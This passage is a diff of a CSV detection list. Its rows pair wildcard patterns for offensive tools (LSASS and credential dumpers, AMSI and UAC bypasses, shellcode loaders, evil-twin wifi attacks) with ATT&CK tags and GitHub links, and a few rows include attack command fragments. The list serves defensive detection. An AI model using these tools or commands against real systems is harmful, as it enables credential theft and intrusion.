Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*dumpntlm.py*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*DumpNTLMInfo.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*DumpProcessByName*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" -"*DumpShellcode.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*DumpShellcode.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*DumpShellcode.exe*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" -"*DumpShellcode\*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified 
process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*DumpSMSAPassword*","offensive_tool_keyword","BloodHound","an adversary with local admin access to an AD-joined computer can dump the cleartext password from LSA secrets of any sMSAs installed on this computer","T1003.001 - T1078 - T1558.002","TA0006 - TA0004 - TA0003","N/A","N/A","AD Enumeration","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*DumpShellcode\*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*DumpSMSAPassword*","offensive_tool_keyword","BloodHound","an adversary with local admin access to an AD-joined computer can dump the cleartext password from LSA secrets of any sMSAs installed on this computer","T1003.001 - T1078 - T1558.002","TA0006 - TA0004 - TA0003","N/A","N/A","AD Enumeration","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" "*dumpVaultCredentials.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*dumpXor.exe *","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*-e --enumerate google*github*k8s --github-only-org --k8s-get-secret-values --gcp-get-secret-values*","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous 
permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","0","N/A","N/A","6","569","80","2023-08-07T04:13:59Z","2022-01-01T12:10:40Z" "*-e ZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA=*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*E09F4899-D8B3-4282-9E3A-B20EE9A3D463*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","0","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" -"*e0be14373098896893f34e02dfe84d3eb64e11d9d9f7f70a15101b41cf9ae5bd*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e0be14373098896893f34e02dfe84d3eb64e11d9d9f7f70a15101b41cf9ae5bd*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*E11DC25D-E96D-495D-8968-1BA09C95B673*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack 
spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","0","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z"
 "*e1cd2b55-3b4f-41bd-a168-40db41e34349*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
 "*E2E64E89-8ACE-4AA1-9340-8E987F5F142F*","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","N/A","10","5","493","77","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z"
-"*e333ccfe9c22eab91abd3ca224c70741e8619bb00353ea3bc4ea9d9f007cdf85*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*e3f9f33e0223371b74d1ce7049a52675ea7a7086f1901b753db3cd9c187246b2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e333ccfe9c22eab91abd3ca224c70741e8619bb00353ea3bc4ea9d9f007cdf85*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*e3f9f33e0223371b74d1ce7049a52675ea7a7086f1901b753db3cd9c187246b2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
 "*E54195F0-060C-4B24-98F2-AD9FB5351045*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z"
-"*e54acaf84b54afaa2320803e0928ce9fbc19d8be3e8df4051b88f1b19cd836a5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*e56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*e6b96e43c3a1a8de682f16086ea8639cfe4649092fc2f47e26fb5baa42a70caf*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*e732850b9f1b5432e5e75ac1ff4312f65e283ee9833b45b390633ea21a99b94a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*e7cb9e5eaca549d918f5f048f55cf67c46e745aeccebc578eb848e46c1915719*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
-"*E82BCAD1-0D2B-4E95-B382-933CF78A8128*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z"
-"*E991E6A7-31EA-42E3-A471-90F0090E3AFD*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - 
TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" -"*e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*ea23a31a0ec1fa3ae2ff1a0bad75421cbd8d74bcfbb7abd2749eb625c918b518*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e54acaf84b54afaa2320803e0928ce9fbc19d8be3e8df4051b88f1b19cd836a5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e56e67b10a67f0d5ef4128c7ab0c6cb9ba9966916720525edfa6abf3101dfe13*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e67d285ac080ed3a22453a79f4390dfb1b5b131569aa53a2cd2502c4b5a69221*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e6b96e43c3a1a8de682f16086ea8639cfe4649092fc2f47e26fb5baa42a70caf*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e732850b9f1b5432e5e75ac1ff4312f65e283ee9833b45b390633ea21a99b94a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*e7cb9e5eaca549d918f5f048f55cf67c46e745aeccebc578eb848e46c1915719*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*E82BCAD1-0D2B-4E95-B382-933CF78A8128*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*E991E6A7-31EA-42E3-A471-90F0090E3AFD*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - 
TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ea23a31a0ec1fa3ae2ff1a0bad75421cbd8d74bcfbb7abd2749eb625c918b518*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*eaphammer -i eth0 --channel 4 --auth wpa-eap --essid * --creds*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*eaphammer*","offensive_tool_keyword","EAPHammer","EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such. focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is. 
our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands","T1553 - T1560 - T1569 - T1590 - T1591","TA0002 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/s0lst1c3/eaphammer","1","0","N/A","N/A","10","1825","296","2023-09-17T10:13:21Z","2017-02-04T01:03:39Z" -"*eapmd5tojohn*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*easinvoker.exe*System32*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*eaphammer*","offensive_tool_keyword","EAPHammer","EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such. focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is. 
our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands","T1553 - T1560 - T1569 - T1590 - T1591","TA0002 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/s0lst1c3/eaphammer","1","0","N/A","N/A","10","1826","296","2023-09-17T10:13:21Z","2017-02-04T01:03:39Z" +"*eapmd5tojohn*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*easinvoker.exe*System32*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*EasyHook-Managed*InjectionLoader.cs*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*EasyHook-Managed*WOW64Bypass.*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*EasyHook-Managed/LocalHook.cs*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of 
